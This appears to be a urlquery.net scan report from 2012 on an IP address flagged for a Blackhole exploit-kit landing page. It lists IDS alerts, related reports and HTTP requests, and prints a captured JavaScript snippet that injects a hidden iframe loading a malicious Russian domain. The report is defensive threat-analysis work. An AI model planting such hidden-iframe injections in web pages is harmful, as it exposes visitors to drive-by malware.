urlquery.net - Free url scanner

Overview

URL	http://110.4.45.59/cgi-sys/defaultwebpage.cgi
IP	110.4.45.59
ASN	AS46015 Exa Bytes Network Sdn.Bhd.
Location	Malaysia
Report completed	2012-11-08 22:19:48 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-08 22:19:15	110.4.45.59	urlQuery Client	2	ET CURRENT_EVENTS Blackhole Try Prototype Catch June 11 2012

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-08 22:19:14	110.4.45.59	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-08 22:19:14	110.4.45.59	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-08 22:19:14	110.4.45.59	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 110.4.45.59

Date	Alerts / IDS	URL	IP
2013-02-09 05:28:31	1 / 1	http://www.acgstore.com/us	110.4.45.59
2013-02-05 14:04:40	1 / 0	http://www.droool.net/view/26/macronimous-web-design-blog.php	110.4.45.59
2013-02-02 10:12:35	2 / 3	http://horngwellfood.com/	110.4.45.59
2013-01-28 20:01:58	2 / 2	http://horngwellfood.com/	110.4.45.59
2013-01-25 02:00:20	1 / 5	http://www.qimendunjia.com/main/	110.4.45.59
2013-01-24 23:16:45	1 / 5	http://www.qimendunjia.com/main	110.4.45.59

Last 6 reports on ASN: AS46015 Exa Bytes Network Sdn.Bhd.

Date	Alerts / IDS	URL	IP
2013-02-14 06:34:25	0 / 3	http://abuanasmadani.com	110.4.45.155
2013-02-13 04:48:18	0 / 0	http://wefreeze.net/	110.4.45.236
2013-02-12 13:23:31	1 / 0	http://www.vipfullhd.com/v1/?p=85	110.4.45.84
2013-02-12 11:33:14	0 / 0	http://www.lima.com.my/	110.4.45.236
2013-02-12 06:11:00	1 / 0	http://www.vipfullhd.com/v1?category_name=uncategorized	110.4.45.84
2013-02-12 05:08:37	1 / 0	http://www.vipfullhd.com/v1?page_id=145	110.4.45.84

Last 1 reports on domain: 110.4.45.59

Date	Alerts / IDS	URL	IP
2012-11-08 22:15:54	1 / 3	http://110.4.45.59/	110.4.45.59

JavaScript

Executed Scripts (3)

Executed Evals (1)

#1 JavaScript::Eval (size: 551, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://autolloans.ru/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://autolloans.ru/');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (0)

HTTP Transactions (7)

Request	Response
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 08 Nov 2012 21:19:13 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
GET /sys_cpanel/images/powered_by.gif HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi	HTTP/1.1 200 OK Content-Type: image/gif Date: Thu, 08 Nov 2012 21:19:14 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT Etag: "2bb0068-ac7-41e6786455c80" Accept-Ranges: bytes Content-Length: 2759 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /sys_cpanel/images/bottombody.jpg HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Thu, 08 Nov 2012 21:19:14 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT Etag: "2bb0066-195-41e6786455c80" Accept-Ranges: bytes Content-Length: 405 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /sys_cpanel/images/apache_pb.gif HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi	HTTP/1.1 200 OK Content-Type: image/gif Date: Thu, 08 Nov 2012 21:19:14 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT Etag: "2bb0069-916-41e6786455c80" Accept-Ranges: bytes Content-Length: 2326 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /favicon.ico HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Thu, 08 Nov 2012 21:19:17 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Accept-Ranges: bytes Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1 Host: 110.4.45.59 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Thu, 08 Nov 2012 21:19:20 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Accept-Ranges: bytes Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Transfer-Encoding: chunked
GET / HTTP/1.1 Host: autolloans.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi